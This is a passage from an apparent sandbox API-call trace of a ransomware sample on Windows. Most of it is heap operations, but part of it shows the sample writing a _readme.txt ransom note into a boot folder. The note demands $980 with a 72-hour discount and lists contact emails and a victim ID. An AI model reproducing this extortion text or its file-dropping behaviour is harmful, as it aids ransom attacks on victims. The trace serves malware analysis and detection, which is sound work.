[0165.582] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.582] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.582] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.582] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.582] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.582] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.582] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.582] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.582] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.582] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.582] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.582] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.582] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.582] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.582] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.582] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.582] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.583] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.583] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.583] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.583] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.583] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.583] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.583] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.583] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.583] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.583] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.583] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.583] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.583] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.583] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.583] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.583] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.583] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.583] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.583] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.583] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.583] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.583] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.583] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.583] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.583] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.583] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.583] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.583] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.583] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.583] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.583] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.583] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.583] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.583] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.583] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.583] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.584] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.584] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.584] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.584] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.584] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.584] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.584] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.584] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.584] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.584] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.584] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.584] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.584] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.584] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.584] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.584] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.584] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.584] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.584] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.586] PathFindFileNameW (pszPath="C:\\Boot\\es-ES\\") returned="es-ES\\" [0165.587] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.587] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.587] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.587] PathFindFileNameW (pszPath="") returned="" [0165.587] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.587] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.587] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.587] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.587] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.587] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.587] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.588] PathAppendW (in: pszPath="C:\\Boot\\es-ES\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 1 [0165.588] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.588] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.588] PathFileExistsW (pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 0 [0165.588] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b44e70 [0165.589] lstrcpyW (in: lpString1=0x3b44e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.589] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.589] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0165.589] CreateFileW (lpFileName="C:\\Boot\\es-ES\\_readme.txt" (normalized: "c:\\boot\\es-es\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.589] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0165.589] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e70 | out: hHeap=0xcd0000) returned 1 [0165.589] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.589] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.589] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.589] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.589] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.589] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0165.589] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0165.589] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.590] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.590] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c200 | out: hHeap=0xcd0000) returned 1 [0165.590] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c200 [0165.590] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.590] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.590] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.590] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.590] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.590] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.590] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.590] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.590] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.590] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.590] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.590] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.590] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.590] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.590] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.590] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.590] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.590] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.590] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.590] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.590] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.590] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.590] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.590] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.590] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.590] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.590] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.590] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.590] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.590] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.590] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.590] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.590] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.591] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.591] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.591] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.591] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.591] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.591] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.591] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.591] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.591] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.591] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.591] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.591] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.591] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.591] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.591] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.591] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.591] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.591] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.591] RtlAllocateHeap 